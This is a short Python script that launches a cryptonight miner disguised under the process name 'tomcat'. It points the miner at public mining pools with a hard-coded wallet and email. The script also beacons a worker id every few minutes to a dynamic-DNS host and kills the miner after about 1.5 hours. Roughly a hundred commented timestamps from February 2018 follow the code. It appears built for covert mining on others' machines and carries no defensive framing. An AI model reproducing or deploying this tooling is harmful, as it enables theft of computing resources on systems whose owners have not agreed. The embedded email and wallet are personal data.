import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:20:02.680902
#2018-02-17 17:08:04.770128
#2018-02-17 18:56:06.990169
#2018-02-17 20:44:07.246050
#2018-02-17 22:31:01.932357
#2018-02-18 00:14:04.454687
#2018-02-18 02:06:05.670053
#2018-02-18 03:54:06.372806
#2018-02-18 05:43:04.922709
#2018-02-18 07:37:05.511758
#2018-02-18 09:24:03.934104
#2018-02-18 11:10:07.575799
#2018-02-18 12:57:03.768208
#2018-02-18 14:46:01.875157
#2018-02-18 16:34:04.627800
#2018-02-18 18:23:07.141095
#2018-02-18 20:09:01.415916
#2018-02-18 21:56:03.287520
#2018-02-18 23:45:07.293697
#2018-02-19 01:31:06.341145
#2018-02-19 03:19:01.290917
#2018-02-19 05:04:04.987272
#2018-02-19 06:48:03.906029
#2018-02-19 08:37:07.028597
#2018-02-19 10:26:01.983867
#2018-02-19 12:14:02.117202
#2018-02-19 14:01:04.750957
#2018-02-19 15:49:09.120588
#2018-02-19 17:37:05.862327
#2018-02-19 19:26:04.778937
#2018-02-19 21:14:04.059787
#2018-02-19 23:00:10.624931
#2018-02-20 00:45:08.382703
#2018-02-20 02:37:04.866977
#2018-02-20 04:26:04.087449
#2018-02-20 06:10:05.744313
#2018-02-20 07:55:03.246170
#2018-02-20 09:40:01.482641
#2018-02-20 11:24:01.888201
#2018-02-20 13:10:08.648243
#2018-02-20 14:54:01.830252
#2018-02-20 16:40:10.412276
#2018-02-20 18:29:06.944384
#2018-02-20 20:20:07.833378
#2018-02-20 22:05:09.732205
#2018-02-20 23:47:07.423702
#2018-02-21 01:31:01.884587
#2018-02-21 03:19:07.810177
#2018-02-21 05:07:07.220177
#2018-02-21 06:55:06.286186
#2018-02-21 08:41:08.462197
#2018-02-21 10:26:08.053099
#2018-02-21 12:14:05.132254
#2018-02-21 14:02:05.400901
#2018-02-21 15:46:12.157343
#2018-02-21 17:39:09.641595
#2018-02-21 19:24:01.845440
#2018-02-21 21:12:06.073511
#2018-02-21 22:58:06.309372
#2018-02-22 00:48:05.827244
#2018-02-22 02:35:05.948572
#2018-02-22 04:20:07.022085
#2018-02-22 06:05:09.156261
#2018-02-22 07:51:01.395632
#2018-02-22 09:39:06.079915
#2018-02-22 11:24:04.728218
#2018-02-22 13:11:01.288135
#2018-02-22 15:02:05.773989
#2018-02-22 16:47:06.252630
#2018-02-22 18:36:08.548077
#2018-02-22 20:28:06.526468
#2018-02-22 22:16:01.623274
#2018-02-23 00:04:05.997789
#2018-02-23 01:54:01.993727
#2018-02-23 03:41:06.551968
#2018-02-23 05:27:07.187755
#2018-02-23 07:14:03.248925
#2018-02-23 09:19:04.418487
#2018-02-23 11:24:07.796593
#2018-02-23 13:14:07.680673
#2018-02-23 14:59:02.184938
#2018-02-23 16:47:04.440813
#2018-02-23 18:41:08.205236
#2018-02-23 20:27:07.510322
#2018-02-23 22:15:06.771676
#2018-02-24 00:03:05.848328
#2018-02-24 01:54:03.820516
#2018-02-24 03:46:07.086790
#2018-02-24 05:34:07.417044
#2018-02-24 07:20:06.329453
#2018-02-24 09:10:09.678511
#2018-02-24 11:09:06.089568
#2018-02-24 12:57:03.796978
#2018-02-24 14:45:08.467052
#2018-02-24 16:37:04.599421
#2018-02-24 18:25:05.170350
#2018-02-24 20:12:04.753058
#2018-02-24 21:57:01.545447
#2018-02-25 00:57:01.686465
#2018-02-25 03:54:07.183554
#2018-02-25 06:39:05.370837
#2018-02-25 11:36:08.172166
#2018-02-25 13:50:01.320408
#2018-02-25 15:24:01.235803